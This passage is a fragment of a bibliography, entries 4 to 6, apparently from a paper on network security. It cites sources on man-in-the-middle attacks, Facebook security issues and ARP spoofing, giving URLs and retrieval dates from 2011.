[4] Saltzman, R. Security Science. OWASP. Retrieved 30 August 2011 from http://www.security-science.com/pdf/active-man-in-the-middle.pdf

[5] Leitch, S. (2009). Security Issues Challenging Facebook. Edith Cowan University Research Online. Retrieved from http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1017&context=ism&sei-redir=1#search=%22facebook%20secure%22

[6] Wagner, R. Address Resolution Protocol Spoofing and Man-in-the-Middle Attacks. Retrieved 30 August 2011 from http://savannah.gatech.edu/people/lthames/dataStore/WormDocs/arppoison.pdf